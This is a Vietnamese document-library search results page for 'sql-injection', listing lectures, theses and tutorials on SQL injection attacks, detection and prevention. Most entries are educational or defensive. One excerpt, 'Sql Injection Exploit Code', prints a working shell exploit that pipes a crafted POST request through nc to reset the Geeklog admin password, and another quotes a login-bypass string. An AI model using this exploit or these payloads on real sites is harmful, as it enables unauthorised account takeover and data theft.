Danh mục
  • Giáo dục phổ thông
  • Tài liệu chuyên môn
  • Bộ tài liệu cao cấp
  • Văn bản – Biểu mẫu
  • Luận Văn - Báo Cáo
  • Trắc nghiệm Online
Kết quả từ khoá "sql-injection"
31 trang
19 lượt xem
5
19
Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF
Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tổng quan về hoạt động của dịch vụ Web; tấn công dạng Command Injection; SQL Injection; XSS; CSRF; quản lý phiên;... Mời các bạn cùng tham khảo!
codabach1016
31 trang
19 lượt xem
5
19
Bài giảng An ninh mạng - Bài 10: An toàn dịch vụ web - SQL injection, XSS, CSRF
Bài giảng An ninh mạng - Bài 10: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tấn công dạng command injection; phòng chống; kịch bản tấn công SQLi; phân tích truy vấn trên cây cú pháp; tautology-based SQLi; cây cú pháp; một số kỹ thuật khai thác SQLi;... Mời các bạn cùng tham khảo!
codabach1016
10 trang
15 lượt xem
5
15
Phát hiện tấn công SQL injection bằng học máy
Bài viết "Phát hiện tấn công SQL injection bằng học máy" sử dụng thuật toán Multinomial Naïve Bayes và K-Nearest neighbors để phân loại dữ liệu được lưu trên file logs dưới dạng văn bản nhằm phát hiện dấu hiệu SQL injection. Kết quả là thuật toán Multinomial Naïve Bayes có độ chính xác cao hơn so với thuật toán K-Nearest Neighbors trong việc phát hiện tấn công SQL injection.
senda222
55 trang
64 lượt xem
13
64
Luận văn Thạc sĩ Công nghệ thông tin: Chống tấn công SQL Injection sử dụng các khuôn mẫu tổng quát
Luận văn đề xuất một cơ chế hoạt động mới cho SDriver,làm giảm khả năng phát hiện nhầm các chuỗi truy vấn hợp lệ thành truy vấn tấn công. Cơ chế hoạt động thay đổi tập trung vào xử lý thành phần chú thích được cho là không cần thiết trong câu truy vấn và chuỗi ký tự do người dùng nhập vào. Mời các bạn cùng tham khảo.
tamynhan0
55 trang
67 lượt xem
10
67
Luận văn Thạc sĩ An toàn thông tin: Chống tấn công SQL Injection sử dụng các khuôn mẫu tổng quát
Luận văn đề xuất một cơ chế hoạt động mới cho SDriver, làm giảm khả năng phát hiện nhầm các chuỗi truy vấn hợp lệ thành truy vấn tấn công. Cơ chế hoạt động thay đổi tập trung vào xử lý thành phần chú thích được cho là không cần thiết trong câu truy vấn và chuỗi ký tự do người dùng nhập vào.
tamynhan1
10 trang
132 lượt xem
15
132
SQL injection attack: Module 14
Tài liệu "SQL injection attack: Module 14" trình bày các chủ đề chính: Tấn công SQl injection là gì, các lỗi SQL thường gặp, một số dạng tấn công SQL Injection thông dụng, phòng chống tấn công SQL Injection... Và các chủ đề khác, mời các bạn tham khảo.
tranhanh9196
37 trang
62 lượt xem
7
62
Lecture SQL injection
Lecture SQL injection presentation of content: What are injection attacks, how SQL sql injection works, exploiting SQL injection bugs, mitigating SQL injection, other injection attacks.
thangnamvoiva20
21 trang
380 lượt xem
38
380
Bài thuyết trình: SQL injection

SQL injection là một kĩ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng trong việc kiểm tra dữ liệu nhập trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu để "tiêm vào" và thi hành các câu lệnh SQL bất hợp pháp. Mời các bạn cùng tham khảo "Bài thuyết trình: SQL INJECTION" để nắm bắt được những nội dung chi tiết.

gaudinh2015
48 trang
168 lượt xem
33
168
Bài giảng SQL Injection
Mời các bạn tham khảo bài giảng SQL Injection sau đây để hiểu rõ hơn về khái niệm SQL Injection; các dạng tấn công bằng SQL Injection; kỹ thuật tấn công bằng SQL Injection; cách phòng tránh; demo. Với các bạn chuyên ngành Công nghệ thông tin thì đây là tài liệu hữu ích.
cocacola_09
3 trang
73 lượt xem
7
73
Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL
Nhằm giúp các bạn có thêm tài liệu phục vụ nhu cầu học tập và nghiên cứu về Công nghệ thông tin, mời các bạn cùng tham khảo nội dung tài liệu "Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL". Tài liệu hướng dẫn cụ thể chi tiết các bước, mời các bạn cùng tham khảo.
iamok147
3 trang
136 lượt xem
18
136
Hướng dẫn khai thác SQL Injection đối với MySQL

Tài liệu Hướng dẫn khai thác SQL Injection đối với MySQL giới thiệu một cách chi tiết và dễ hiểu về cách khai thác SQL Injection đối với MySQL. Đây là tài liệu hữu ích với những bạn chuyên ngành Công nghệ thông tin và những bạn quan tâm tới lĩnh vực này, mời các bạn tham khảo.

 

iamok147
3 trang
191 lượt xem
43
191
Tìm hiểu về SQL Injection
1. SQL Injection là gì? 2. Tìm kiếm mục tiêu 3. Kiểm tra chỗ yếu của trang web 4. Tại sao ' or 1=1-- có thể bypass login? 5. Thi hành lệnh từ xa bằng SQL Injection 6. Nhận output của SQL query 7. Nhận data qua 'database using ODBC error message' 8. Xác định tên của các column trong table 9. Thu thập các dữ liệu quan trọng 10. Nhận các numeric string 11. Update/insert data vào CSDL 12. Ngăn chặn SQL Injection 13. Tài liệu thao khảo 1) SQL Injection là gì? SQL Injection là một trong những...
bibocumi28
31 trang
220 lượt xem
83
220
Tối ưu hóa tấn công Blind Sql Injection quá nhanh và quá nguy hiểm
Tối ưu bằng cách dùng phép dịch bit dựa vào kết quả đã được đánh chỉ mục (3) . Khi ép kiểu lại, chúng ta biết rằng CAST(b'11' AS DEC) là số 3 tương ứng với 'c' trong danh sách, tất cả chỉ tốn 3 truy vấn! . Danh sách dài 45 , BIN(45) = 101101, cũng chỉ mất 7 truy vấn cho ký tự ở vị trí cuối cùng danh sách.
trunglvt
4 trang
98 lượt xem
20
98
Chặn hacker SQL Injection với ASP
SQL Injection là một công cụ cụ tấn công Web của hacker để trộm thông tin quan trọng, mang tính sống còn của các tổ chức, công ty dễ bị tấn công. Đây là một loạt các code hacker sử dụng khi ứng dụng web của bạn không mã hóa. Chúng có thể sử dụng những lệnh SQL này để đăng nhập vào trang web hoặc máy chủ của bạn để ăn trộm cơ sở dữ liệu cũng như lấy đi tất cả những thông tin quan trọng của công ty mà chúng thấy. .Hầu hết các công ty ngày nay...
kmkmkmkmkm
64 trang
971 lượt xem
216
971
Đồ án : PHƯƠNG PHÁP TẤN CÔNG VÀO TRANG WEB VÀ CÁCH PHỒNG CHỐNG, XÂY DỰNG ỨNG DỤNG DEMO SQL INJECTION
Ngày nay, khi Internet được phổ biến rộng rãi ,các tổ chức đều có nhu cầu giới thiệu thông tin của mình trên xa lộ thông tin cũng như thực hiện các phiên giao dịch trực tuyến. Vấn đề nảy sinh là vi phạm ứng dụng của các ứng dụng web ngày càng mở rộng thì khả năng xuất hiện lỗi và bị tấn công càng cao, trở thành đối tượng cho nhiều người tấn công với các mục đích khác nhau. Đôi khi cũng chỉ đơn giản là để thử tài hoặc đùa bởn với người khác....
maulanh_pro88
5 trang
446 lượt xem
117
446
TẤN CÔNG KIỂU SQL INJECTION TÁC HẠI VÀ PHÒNG TRÁNH
Khi triển khai các ứng dụng web trên Internet, nhiều người vẫn nghĩ rằng việc đảm bảo an toàn, bảo mật nhằm giảm thiểu tối đa khả năng bị tấn công từ các tin tặc chỉ đơn thuần tập trung vào các vấn đề như chọn hệ điều hành, hệ quản trị cơ sở dữ liệu, webserver sẽ chạy ứng dụng, ... mà quên mất rằng ngay cả bản thân ứng dụng chạy trên đó cũng tiềm ẩn một lỗ hổng bảo mật rất lớn. Một trong số các lỗ hổng này đó là SQL injection. Tại Việt Nam, đã...
babylove117x
6 trang
387 lượt xem
160
387
Tổng quát SQL Injection
SQL Injection 1) SQL Injection là gì? SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, ... 2) Tìm kiếm mục tiêu Bạn có thể search các trang web cho phép submit data ở...
tt1991tt
2 trang
247 lượt xem
68
247
Sql Injection Exploit Code
Sql Injection Exploit Code hack site Geeklog version 1.3.8-1sr1 Đôi nét về greedlog.net http://www.geeklog.net/ Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php 2.code khai thác Exploit: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80 This should change the Admin user's password to "new". You have to change the /path/to/gl/users.php according to your Geeklog installation. Immune systems: * Geeklog version 1.3.8-1sr2 The below exploit uses the "forgot password" feature introduced in Geeklog 1.3.8. By constructing a certain...
tt1991tt

Giới thiệu

Về chúng tôi

Việc làm

Quảng cáo

Liên hệ

Chính sách

Thoả thuận sử dụng

Chính sách bảo mật

Chính sách hoàn tiền

DMCA

Hỗ trợ

Hướng dẫn sử dụng

Đăng ký tài khoản VIP

Zalo/Tel:

093 303 0098

Email:

support@tailieu.vn

Phương thức thanh toán

Layer 1

Theo dõi chúng tôi

Facebook

Youtube

TikTok

Chịu trách nhiệm nội dung: Nguyễn Công Hà. ©2025 Công ty TNHH Tài Liệu trực tuyến Vi Na.
Địa chỉ: 54A Nơ Trang Long, P. Bình Thạnh, TP.HCM - Điện thoại: 0283 5102 888 - Email: info@tailieu.vn
Giấy phép Mạng Xã Hội số: 670/GP-BTTTT cấp ngày 30/11/2015